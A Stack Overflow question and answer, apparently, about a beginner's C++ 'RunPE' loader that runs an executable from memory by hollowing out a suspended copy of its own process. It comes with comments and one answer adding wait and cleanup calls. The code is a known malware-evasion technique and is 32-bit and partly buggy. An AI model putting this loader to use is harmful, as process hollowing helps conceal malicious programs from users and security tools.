C++ How to execute a binary from Memory?

Question

Hi i want execute binary code of a exe / dll file from memory and i found this code:

#include <iostream> // Standard C++ library for console I/O
#include <string> // Standard C++ Library for string manip

#include <Windows.h> // WinAPI Header
#include <TlHelp32.h> //WinAPI Process API

int RunPortableExecutable(void* Image)
{
    IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
    IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
    IMAGE_SECTION_HEADER* SectionHeader;

    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;

    CONTEXT* CTX;

    DWORD* ImageBase; //Base address of the image
    void* pImageBase; // Pointer to the image base

    int count;
    char CurrentFilePath[1024];

    DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
    NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize

    GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable

    if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
    {
        ZeroMemory(&PI, sizeof(PI)); // Null the memory
        ZeroMemory(&SI, sizeof(SI)); // Null the memory

        if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
            CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
            //process in suspended state, for the new image.
        {
            // Allocate memory for the context.
            CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
            CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

            if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
            {
                // Read instructions
                ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

                pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
                    NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

                // Write the image to the process
                WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

                for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
                {
                    SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));

                    WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
                        LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
                }
                WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
                    LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

                // Move address of entry point to the eax register
                CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
                SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
                ResumeThread(PI.hThread); //´Start the process/call main()

                return 0; // Operation was successful.
            }
        }
    }
}

// enter valid bytes of a program here.
unsigned char rawData[37376] = {
    0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

int main()
{
    RunPortableExecutable(rawData); // run executable from the array
    getchar();
}

This code i found on github when i start it it just waits does nothing: Than i replaced my own binary codes to project like this:

Its too long so im sharing a picture.

When i debug it i see this error:

But also sometimes works?!

What is problem? and how to solve? thats really weird :/

this is what i use on visual studio (sorry im new and extremelly noob :D)

If you are a noob, how would you expect to understand the solution? — jtxkopt, Sep 10 '22 at 21:36
If you are new to the language, there is no reason for you to try to do this. This is something you need only for rather advanced things like writing JIT compilers. This is also full of platform-specific code. Learn the language properly from some structured material, e.g. the [recommended books](https://stackoverflow.com/questions/388242/the-definitive-c-book-guide-and-list). — user17732522, Sep 10 '22 at 21:38
@jtxkopt i know a few languages like python and c# but i can understand it a little. — noobirasit, Sep 10 '22 at 21:40
I don't undestand Turkish(!) messages, but recognize the code 0xc0000005- memory access violation. — BoP, Sep 10 '22 at 21:42
I mean, it involves [**Portable Executable**](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) details and x86 assembly language. They are highly technical concepts for a noob. And knowing C# and Python doesn't help you. — jtxkopt, Sep 10 '22 at 21:43
You would not comprehend the solution. You should postpone your malware experiments until you know how to read documentation and write code. — IInspectable, Sep 11 '22 at 06:37
Everyone above is correct. You can't hope to achieve something like this without gaining a deep understanding of numerous topics. Like you don't start a course in nuclear physics and expect to be able to build a reactor on day 1 — David Heffernan, Sep 11 '22 at 07:16

score 0 · Answer 1 · answered Sep 25 '22 at 03:19

Remember that you're forking the same process and rewriting the process memory with your custom PE file, so when the Process starts it will start as a child of the stub executable, and seems that you're not waiting for the object to return

    WaitForSingleObject(
        PI.hProcess,
        INFINITE
    );

    GetExitCodeProcess(
        PI.hProcess,
        &dwRet
    );

    CloseHandle(PI.hThread);
    CloseHandle(PI.hProcess);

Also you might be interested in attaching the child process to some debugger (i.e x64dbg) and check if it's raising any exception itself.

C++ How to execute a binary from Memory?

1 Answers1